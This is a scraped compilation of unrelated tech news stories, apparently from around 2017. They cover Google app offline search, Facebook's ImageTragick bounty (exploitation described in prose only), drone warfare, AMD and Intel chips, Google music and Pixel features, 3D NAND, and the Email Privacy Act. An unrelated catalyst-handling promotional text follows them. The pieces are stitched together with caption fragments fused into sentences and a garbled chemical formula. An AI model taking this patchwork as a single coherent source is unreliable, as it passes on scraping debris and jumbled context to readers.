Android Google app now stores offline searches and runs them when a signal returns

Stop me if you’ve heard this one: You’re trying to read a news story about Facebook or look up the latest rumors about the Galaxy S8, and you hit a dead spot. You tap reload a couple of times, wait a few seconds, and give up.google app offline search

Google feels your pain, and it doesn’t want you to miss out on valuable information just because your connection flaked out. With a new update rolling out to the Android Google app, your searches will be saved and delivered as soon as your connection returns. As Google search project manager Shekhar Sharad writes in a blog post, “The Google app will work behind-the-scenes to detect when a connection is available again and deliver your search results once completed.”

offline google search
The Google app will remember any searches you make when your connection dies and notify you when they’ve been completed.

The only rub is that you’ll need to remember to use the Google app rather than Chrome for your on-the-go Googling. Although Google promises that the new feature will have minimal effect on battery life and data usage, if you’d like to turn it off, however, there’s a new Always retry searches switch in the Offline search Settings that will disable it. And you can also see any and delete any pending queries using the new Manage searches option in the sidebar. Finally, you can opt to have a notification alert you that the search has been completed.

The update is currently rolling out to users, but if you aren’t seeing it, you can download the Google-signed APK from APKMirror.

Actually, there’s more of an impact away from your home. Occasionally spotty LTE connections are a problem all phones have, and while this update doesn’t do anything to alleviate the issue, it does help make them that much more bearable. And it might make us use the Google app more to boot.

This story, “Android Google app now stores offline searches and runs them when a signal returns” was originally published by Greenbot.

Failure to patch known ImageMagick flaw for months costs Facebook $40k

It’s not common for a security-conscious internet company to leave a well-known vulnerability unpatched for months, but it happens. Facebook paid a US$40,000 reward to a researcher after he warned the company that its servers were vulnerable to an exploit called ImageTragick.facebook stock headquarters building

ImageTragick is the name given by the security community to a critical vulnerability that was found in the ImageMagick image processing tool back in May.

ImageMagick is a command-line tool that can resize, convert and optimize images in many formats. Web server libraries like PHP’s imagick, Ruby’s rmagick and paperclip, and Node.js’s imagemagick, used by millions of websites, are based on it.

The ImageMagick developers attempted to patch the ImageTragick flaw after it was privately reported to them, but their fix was incomplete. Soon after, hackers started exploiting them in widespread attacks to compromise web servers.

In October, a security researcher named Andrey Leonov was investigating Facebook’s content sharing mechanism, which generates a short description for external URLs shared by users, including a resized image grabbed from the shared page.

According to the researcher, he was hoping to find a Server-Side Request Forgery (SSRF) or XML External Entity (XXE) vulnerability that he could report to Facebook and get a reward through the company’s bug bounty program.

When he failed to find such flaws, he got the idea to test for the ImageTragick flaw as a last resort, because Facebook was resizing images and there was a chance it was using this tool.

The first exploitation attempt failed because it was intended to execute a command on Facebook’s server that would call out a web page on an external server, Leonov explained in a blog post Tuesday.

The researcher then realized that the server might be behind a firewall that only allows requests to trusted servers. So he repeated his exploit, but this time used a DNS tunneling trick, where data is leaked to an external DNS server through DNS requests.

According to Leonov, this worked and he managed to get a directory listing from Facebook’s server relayed to his own server via DNS requests.

The researcher reported the vulnerability to Facebook on Oct. 16, and the company patched it three days later after confirming it. The company paid Leonov a $40,000 bounty, one of the largest rewards it has paid for a single vulnerability report.

For webmasters, this should serve as a reminder to patch the ImageTragick flaw if they haven’t until now. Security researcher Michal Zalewski published a blog post in May with various mitigation suggestions, including limiting which image formats ImageMagick is allowed to process and sandboxing the tool.

Zalewski believes that ImageMagick users should stop the tool entirely in favor of libraries such as libpng, libjpeg-turbo, and giflib. That’s because there’s a long history of vulnerabilities in ImageMagick, and tests performed with automated fuzzing tools revealed many potentially exploitable bugs.

Modern warfare: Death-dealing drones and … illegal parking?

A cloud of 3D-printed drones big enough to bring down the latest U.S. stealth fighter, the F35, was just one of the combat scenarios evoked in a discussion of the future of warfare at the World Economic Forum in Davos on Wednesday.davos guehenno cummings

Much of the discussion focused on the changes computers are bringing to the battlefield, including artificial intelligence and autonomous systems—but also the way the battlefield is coming to computing, with cyberwar, and social media psyops an ever more real prospect.

Former U.S. Navy fighter pilot Mary Cummings, now director of the Humans and Autonomy Lab at Duke University, delivered the first strike.

“The barrier to entry to drone technology is so low that everyone can have one, and if the Chinese go out and print a million copies of a drone, a very small drone, and put those up against an F35 and they go into the engine, you basically obviate what is a very expensive platform,” she said.

Drones could not only defeat the F35, on which the U.S. is spending what Cummins called “a ridiculous amount of money,” but also replace them, she said.

“ISIS can go out now and print drones with a 3D printer, can print thousands of drones with a 3D printer at very low cost, and arm them with conventional weapons or biological weapons for example, and basically result in much more devastation than an F35 in a surgical strike could cause,” she said.

That gave Dutch Minister of Defense Jeanine Hennis-Plasschaert pause for thought. “As I placed an order for I don’t know how many F35s, I just wonder if you could advise me whether I should continue or not?” she asked Cummings.

If the perceived value of an F35 is falling, though, so too is its cost. “The price is dropping, as I understood last week from Lockheed Martin,”Hennis-Plasschaert said.

In the Netherlands, there is a hot debate on the use of autonomous weapons, according to Hennis-Plasschaert. “It’s important that the deployment of such weapons must always involve meaningful human control,” she said. On the flip side, future enemies may not feel the same way: “We may face self-learning systems that are able to modify their own rules of conduct, and so there’s this ethical question.”

That’s not the only ethical question governments will need to answer, though.

With war no longer just about territorial control, “we run the risk of cyberspace being the battle space in the future,” Hennis-Plasschaert said.

Agreeing on limits to such conflicts will be difficult, as there is insufficient cooperation between governments at the moment.

The Law of the Sea treaty is a nice example, she said, “but to copy this for cyberspace is not easy.”

There are other boundaries to set when it comes to drone warfare, too.

“We have fully autonomous defensive weapons today,” Cummings said. She wondered why they are OK, while fully autonomous offensive weapons are not.

She raised the question of future autonomous missile technology that might be able to target a person not by their GPS coordinates, as today, but by their photograph. “That missile could do a better job of targeting a bad person than a human could,” she said. That scenario would make her reluctant to put a blanket ban on autonomous offensive weapons, she said.

Targeting a specific person through their photo “really is an illustration of the blurring of the line between war and peace,” said Jean-Marie Guéhenno
president and CEO of International Crisis Group and a former UN peacekeeper. The traditional way of dealing with that would be through a court or military tribunal, he said.

Airborne drones aren’t the only autonomous vehicles that might cause concern, Cummings said.

“When we go to an internet of things for vehicles, we will have a potential worldwide connectivity of terrorism, where terrorists can get into the network and start hacking driverless cars.”

Worse still, she said, they could hack a truck. They don’t even have to have explosives on board to cause trouble she said: Hacking half a dozen trucks in the Washington, D.C., area and stopping them in the right places could bring traffic to a halt and open the way for all sorts of mischief.

But what of social media? “Does the power of social media mean traditional military might is less important?” asked Shirley Ann Jackson, president of Rensselaer Polytechnic Institute.

Social media plays a role, said Lawrence Freedman, emeritus professor of war studies at King’s College London. “But I don’t think we should consider that new,” he said. “If we look back at the strategists of the past, what they called the psychological element was always there, was always important.”

So there you have it: In the future, war may not be declared by drones dropping destruction on our heads, but by a spate of unexplained illegal parking downtown.

AMD talks tough as it drums up support for 32-core Zen server chip

At CES, AMD launched its first Zen chips for PCs, called Ryzen. Next on deck is the 32-core server chip code-named Naples, which will ship in the coming months.Opteron A1100

Naples doesn’t have an official name yet, but the expectations are high. While Ryzen is set up for success in PCs, it’s a different story for Naples, which has to take on Intel’s juiced-up Xeon chips, which are used in most servers today.

AMD is trying to drum up excitement for Naples, which will be released in the first half of this year. It’s promoting Naples using the same tactic as it did for Ryzen—by talking about the performance benefits of the Zen CPU.

The Zen CPU core in Naples will provide the same performance benefits as in the Ryzen chips. AMD claims a 40 percent improvement in instructions per cycle, an important metric to measure CPU performance, compared to the company’s previous Excavator architecture.

Naples is notable for its high 32-core count, more than Intel’s Xeon chips, which have up to 24 cores. The Intel Xeon Phi supercomputing chip has up to 72 cores, but it isn’t targeted at mainstream socketed servers.

A higher core count matters as servers can do more, Forrest Norrod, senior vice president and general manager at AMD, said in a blog entry this week.

More data is moving into the cloud, which is putting more strain on servers in data centers. More cores will add processing power to help servers respond quickly to search requests, recognize images, and process uploaded videos faster. A server with a single CPU will be able to do as much as a current two-socket server, Norrod said.

AMD will come out with more Zen-based server chips with lower core counts, said Jim McGregor, principal analyst at Tirias Research.

A bulk of the servers today use quad-core chips, and the actual market for 32-core Naples will be limited. The server market is dominated by two-socket servers, while Intel’s 24-core chips go into a four- and eight-socket servers, which are used by companies like financial institutions that need a lot of horsepower.

“Intel has used Xeon to bleed the market” by forcing people to buy two-socket servers, and AMD could change that trend, McGregor said.

AMD will also pack in new memory bandwidth technology, which will boost server performance and possibly give it an edge over Xeon, McGregor said. It’s not clear what the technology will be, but it could be based on technology from Gen-Z, a consortium that is developing a high-speed throughput for use inside and outside servers.

AMD has surprised Intel in the server market in the past, only to self destruct. In 2003, it came out with the first 64-bit x86 server chip called Opteron, and Intel had to scramble to catch up. AMD lost the lead with its Opteron chips based on the Bulldozer architecture, which underperformed and were rejected by server makers.

The company killed whatever server market presence it had with another fateful decision to switch architectures. In 2013, AMD took the radical decision to put x86 on the backburner and reboot its server strategy around ARM architecture. AMD believed the power-efficient ARM chips would ultimately replace x86 in servers and have a 20 percent market share by 2017, but that hasn’t happened.

AMD shipped its first ARM server chips early last year, but ARM chips are virtually non-existent in servers today, though the promise remains.

Realizing its mistake, AMD reversed course, moving away from ARM for servers and switching back to x86 with Zen chips. In the meantime, Intel took advantage of AMD’s missteps and steadily rolled out new Xeon chips that supported the latest technologies. Intel now holds more than a 90 percent market share in server processors.

AMD has a big challenge with 32-core Naples. Companies like Google, Facebook and Amazon are building mega data centers with servers based on Xeon. Those companies have software stacks tuned closely to the processing, I/O, power, and throughput specifications of Xeon chips, and it could be tough for AMD to break into large accounts.

But AMD’s Naples is the first legitimate x86 challenger to Xeon in years. Google, Facebook, and Amazon could use AMD’s chip as leverage to get better chip prices from Intel. Xeon chips are expensive, and the margins make them highly profitable products for Intel.

Companies won’t make a switch to AMD overnight; it could take a year or more to ensure applications work on the new chips. But the competition is good, and AMD has nowhere to go but up in the server market, McGregor said.

AMD also has some technologies that could work to its advantage. It has mulled pairing a Zen server chip with its Vega GPU, which could be useful for tasks like machine learning. The company has also released a GPU targeted at machine learning called Radeon Instinct, but that’s effort is targeted toward Nvidia’s Tesla GPU, which dominates data centers.

Server wins for Naples are already coming AMD’s way. The company is also chasing the Chinese server market—which is growing fast—by licensing its Zen design to THATIC (Tianjin Haiguang Advanced Technology Investment Co.), a joint venture between AMD and a consortium of public and private Chinese companies.

Google merges YouTube, Play Music teams as it looks to create a streamlined experience

Google’s YouTube Music and Play Music apps have always been two ships in need of a single rudder, offering an overlapping set of features with separate logins and interfaces. Now, Google has taken the first step toward streamlining its music streaming experience.9 google play music tips tinker with music queue 7

According to a report by The Verge, Google has merged its YouTube Music and Google Play Music teams into a single unit, marking the first step toward a possible creation of a unified experience across a single app. While a subscription to Google Play Music or YouTube Red already includes access to the other service (and both have a decent chunk of content that can be accessed for free), Google told the Verge that improvements to the way the two services interact could be coming:

“Music is very important to Google and we’re evaluating how to bring together our music offerings to deliver the best possible product for our users, music partners and artists. Nothing will change for users today and we’ll provide plenty of notice before any changes are made.”

When asked about the rate of YouTube Red signups during Alphabet’s fourth-quarter conference call last month, Google CEO Sundar Pichai also alluded to some changes to Google’s music streaming strategy. “We have YouTube Red, YouTube Music and we do offer it across Google Play Music as well,” he said. “You will see us invest more, more countries, more original content. And we’ll bring together the experiences we have over the course of this year, so it’s even more compelling for users.”

Streaming is rapidly becoming one of the music industry’s biggest business, but it’s unclear how much of the pie Google actually owns. Spotify is still far and away the biggest music streaming service with some 40 million subscribers, but Apple Music is gaining fast, having crossed the 20 million threshold after just a year and a half. However, while Google has yet to release any subscriber numbers for either Play Music or YouTube Red, which are bundled, it has a built-in advantage by pre-installing the app on most Android phones, much like Apple does with Apple Music. And a simple, single experience across YouTube and Play Music could prove to be a serious threat to Spotify’s dominance.

This story, “Google merges YouTube, Play Music teams as it looks to create a streamlined experience” was originally published by Greenbot.

Now you can control your smart devices from your Pixel, no Google Home required

One of the best features of Google Home is the ability to control all of the smart devices in your house, letting you turn on the lights or set the thermostat without fiddling with any apps or controls. Now you can use Google Assistant on your Pixel phone to do the same thing.google assistant home

First spotted by Android Police, the settings menu in Google Assistant on the Pixel adds a new tab for Home control, letting you talk to your various devices without lifting a finger. And you don’t need you have a Google Home to do it. Previously, the Pixel could interact with the Home to operate Nest smart devices, but now your phone can do it all on its own.

That means you can control all of your Home-enabled smart devices, not just the ones that are owned by Alphabet. According to Android Police, the requirements appear to be version 6.12.19 of the Google app and Play Services 10.2.98. The new feature is a server-side one, however, so if you’re not seeing it on your phone, you may have to wait for Google to flip the switch.

Slowly but surely, Google Assistant on the Pixel is gaining feature parity with Google Home. While the overarching strategy for Google’s voice-operated AI is still hazy, it appears that we’re building toward some kind of a unified system, where saying “OK, Google” does the same things across all of our devices.

This story, “Now you can control your smart devices from your Pixel, no Google Home required” was originally published by Greenbot.

Intel: Cannonlake CPUs will be more than 15 percent faster than Kaby Lake

Upgrading CPU performance hasn’t been a priority for Intel in many years, but that could be changing.Intel chip

Intel’s upcoming Cannonlake chips will deliver a performance improvement of more than 15 percent compared to its Kaby Lake chips, said Venkata Renduchintala, president of the Intel Client and Internet of Things businesses and Systems Architecture Group.

Intel didn’t provide exact numbers at the company’s annual investor day Thursday, but the projection is based on the SysMark benchmark. Detailed performance improvement numbers will emerge over time.

intel roadmap cannonlake

Agam Shah

A slide from Intel’s investor day shows Intel’s projected roadmap toward its 8th-gen “Cannonlake” chip.

The performance improvements from Skylake to Kaby Lake topped out at 15 percent. The CPU performance boost for Cannonlake should be at least that, Intel said.

The first Cannonlake chips are scheduled to ship in the second half of this year. The chips—called 8th-generation chips on an Intel slide—could include Core i7 chips.

Intel showed a Cannonlake chip at CES. The chip will be the first made on Intel’s 10-nanometer process, which will deliver a substantial reduction in power consumption, Renduchintala said.

Intel may be trying to catch up with AMD, which is boasting a 40 percent performance improvement for its upcoming Ryzen chips. Ryzen’s numbers are based on IPC (instructions per cycle), an important performance metric.

The benefit of high-performance PC chips isn’t lost on Intel. The gaming market is exploding, especially eSports, and demand for high-performance Core i7 chips skyrocketed last year, Renduchintala said.

As markets like virtual reality heat up, buyers will be motivated to upgrade to Core i7 chips from Core i3 chips. The Core i7 chips today are up to 36 percent faster than Core i3 chips, Renduchintala said.

Chipmakers in past years focused on increasing performance by raising the clock frequency. But that made chips power hungry, and their focus shifted to adding cores, which boosted performance but also added battery life to laptops. Then the focus turned to integrating technologies like graphics and I/O buses inside processors. Gaming and virtual reality have brought a focus back to raw CPU performance.

There’s a limited scope for growth in the PC market, with gaming and VR being the bright spots, and both right now require high-performance CPUs. Unlike in the past, Intel doesn’t want to sell low-margin chips that would ultimately incur a loss.

Intel was “disciplined” with its PC business, and the focus was on high-margin products like Core i7 chips. Intel’s highest priced PC chip is the Core i7-6950X, which is priced at US$1,723, and it generates a high profit margin for Intel.

But Intel will have to contend with AMD, which is coming on strong with Ryzen. Analysts say Ryzen will start off strong in high-end gaming PCs based on the early hype, but then its success will depend on word-of-mouth recommendations. Ryzen’s subsequent success in consumer laptops and desktops will depend on PC makers adopting the chip.

Western Digital begins production of the world’s tallest 3D NAND ‘skyscraper’

Western Digital today announced that it has kicked off production of the industry’s densest 3D NAND flash chips, which stack 64 layers atop another and enable three bits of data to be stored in each cell.Toshiba BiCS 3D NAND flash

The 3D NAND flash chips are based on a vertical stacking or 3D technology that Western Digital and partner Toshiba call BiCS (Bit Cost Scaling). WD has launched its pilot production of its first 512 gigabit (Gb) 3D NAND chip based on the 64-layer NAND flash technology.The industry’s densest 3D NAND flash chips are based on a vertical stacking or 3D technology that Western Digital and partner Toshiba call BiCS (Bit Cost Scaling). Their latest memory stores three bits of data per cell and stacks those cells 64 layers high

In the same way a skyscraper allows for greater density in a smaller footprint, stacking NAND flash cells—versus planar or 2D memory -enables manufacturers to increase density, which enables lower cost per gigabyte of capacity. The technology also increases data reliability and improves the speed of solid-state memory.

Three-dimensional NAND has allowed manufacturers to overcome physical limitations of NAND flash as transistor sizes approached 10 nanometers and the ability to shrink them further quickly dissipated.

bics3 3D NAND flash WD

The latest 3D NAND chips have been used to create gum stick-sized SSDs with more than 3.3TB of storage and standard 2.5-inch SSDs with more than 10TB of capacity.

Samsung became the first company to announce it was mass-producing 3D flash chips in 2014. Their technology, called V-NAND, originally stacked 32-layers of NAND flash. Samsung’s V-NAND also crammed 3-bits per cell in what the industry refers to as triple-level cell (TLC) NAND or multi-level cell (MLC) NAND. Because Samsung uses TLC memory, its chips were able to store as much as Toshiba’s original 48-layer 3D NAND chips, which stored 128Gbits or 16GB.

Intel and Micron also produce 3D NAND.

WD first introduced initial capacities of the world’s first 64-layer 3D NAND technology in July 2016.

fms sandisk keynote 2015 kevin conley 3d nand slide 100649162 orig

Even as 2D NAND approaches scaling limits due to lithography size and error rates, layer stacking to produce 3D NAND obviates all those concerns. The picture shown illustrates one method of achieving 3D NAND. Horizontally stacked word lines around a central memory hole provide the stacked NAND bits. This configuration relaxes the requirements on lithography. The circular hole minimizes neighboring bit disturb and overall density is substantially increased.

Pilot production of WD’s new 64-layer 3D NAND chips began in its Yokkaichi, Japan fabrication plant, and the company plans to begin mass production in the second half of 2017.

“The launch of the industry’s first 512Gb 64-layer 3D NAND chip is another important stride forward in the advancement of our 3D NAND technology, doubling the density from when we introduced the world’s first 64-layer architecture in July 2016,” Dr. Siva Sivaram, executive vice president of memory technology for WD, said in a statement.

This story, “Western Digital begins production of the world’s tallest 3D NAND ‘skyscraper'” was originally published by Computerworld.

US House approves new privacy protections for email and the cloud

The U.S. House of Representatives approved on Monday the Email Privacy Act, which would require law enforcement agencies to get court-ordered warrants to search email and other data stored with third parties for longer than six months. The U.S. House of Representatives has passed an email privacy bill.

The House approved the bill by voice vote, and it now goes the Senate for consideration.

The Email Privacy Act would update a 31-year-old law called the Electronic Communications Privacy Act (ECPA). Some privacy advocates and tech companies have pushed Congress to update ECPA since 2011. Lax protections for stored data raise doubts about U.S. cloud services among consumers and enterprises, supporters of the bill say.

Under ECPA, the protections are different for older or more recent data. Law enforcement agencies need warrants to search paper files in a suspect’s home or office and to search electronic files stored on the suspect’s computer or in the cloud for less than 180 days. But files stored for longer have less protection. Police agencies need only a subpoena, not reviewed by a judge, to demand files stored in the cloud or with other third-party providers for longer than 180 days.

That difference in the way the law treats stored data is a “glaring loophole in our privacy protection laws,” said Representative Jared Polis, a Colorado Democrat and co-sponsor of the bill.

The Email Privacy Act will bring U.S. digital privacy laws into the 21st century, said Representative Kevin Yoder, a Kansas Republican and co-sponsor of the bill.

Supporters of the bill argue internet users’ privacy expectations have changed since ECPA passed in 1986. Storage was expensive back then, and only about 10 million people had email accounts, Yoder said. Now internet users are more likely to store sensitive communications with cloud providers and other internet-based companies.

Under former President Barack Obama, the Department of Justice was cool to the idea of changing ECPA. The changes will make it tougher for law enforcement agencies to investigate crimes and terrorism, some critics say.

A similar bill passed the House by a 419-0 vote in April 2016, but the Senate failed to act and the legislation died after a new Congress was elected in November. The new version of the Email Privacy Act, introduced Jan. 9, has already collected 108 cosponsors, about a quarter of the membership of the House.

The bill would not protect internet companies from searches of their overseas servers by U.S. law enforcement agencies. Microsoft and Google have been fighting warrants for user data located outside the U.S.

Before the vote, the Consumer Technology Association urged the House to pass the bill. ECPA which was “written before Congress could imagine U.S. citizens sharing and storing personal information on third-party servers, is woefully out of date,”  Gary Shapiro, president and CEO of the CTA, said in a statement.

Catalyst Handling & Mechanical Services

Effective catalyst handling services are performed by high skilled specialist teams. A range of services, including project planning, estimating, safety and quality planning, and execution of the client’s project, are components of catalyst handling. However, it’s possible for a specialized resource firm to engage at any stage of the client’s need.

Image result for Catalyst Handling & Mechanical Services
Turnaround flows may include the establishment of safety parameters and quality requirements; resourcing and/or outsourcing tasks to other contractors and sub-contractors; and management of an internal or augmented team. The goal of any catalyst handling team is to safely execute work to ensure minimum client downtime.

Planning & Management

Catalyst handling may involve the need to carefully plan a client site shutdown months in advance. It’s often essential to mobilize a specialist team to include planning, organization, and management of the contractor team and/or any subcontractors engaged to perform the work.

The management of shutdowns must consider all necessary steps from inception and planning of the project to its final stages of plant reactivation. The catalyst handling contract must often oversee an internal team as well as their own staff and subcontractors to accomplish the client’s job requirements. It’s often essential to operate with speed, but safety can’t be sacrificed to get the job done.

Proprietary Process

Most catalyst handling firms develop their own critical equipment and processes but the client’s needs almost always dictate access to modern refining technologies via license agreements held by other parties. In other words, the catalyst handling firm must maintain good relationships throughout the global industry and access precisely what the client needs on demand.

All catalyst handling projects are complex, so each client receives a customized project plan and estimate. The contractor firm must solve one or more specific client problem. Understanding the client’s scope of work and critical path are essential to execution, however. Hazard analysis and assessments are always part of the path to project completion.

Catalyst Handling Team

Some of the processes managed by an experienced catalyst handling team include: hydrocracking; sulfur recovery units (SRU); methanol reactors; sulfuric acid converters; phthalic anhydride (C?H?(CO)?O; natural gas dehydration; residual desulfurization (VRDS + RDS); hydrogen desulfurization; hydro-desulfurization; hydro-treating; FCCU; single + multibed reactors; ethylene oxide, acrylic acid, VCM; ammonia synthesis converters; vinyl acetate; hydrogen; olefins productions; catalytic cracking, steam methane reformers; tube sheet reactors; primary & secondary reformers; municipal potable water; and much more.

Cost Efficiency

Clients in search of catalyst handling requirements need a firm that can plan and execute a turnaround. Involvement at every stage of the process helps the client to reduce organization barriers, time, and money. Efficiency goals are at the heart of the process because, without step-by-step planning, it’s difficult to effectively execute the client’s goals.

The client company is always at the head of the organizational chart, and the catalyst handling team must work hand-in-hand with the client from start to finish of the project. When the project is completed, the catalyst handling team’s work isn’t finished. It’s essential to debrief the client to identify future cost savings, improvements, and best practices.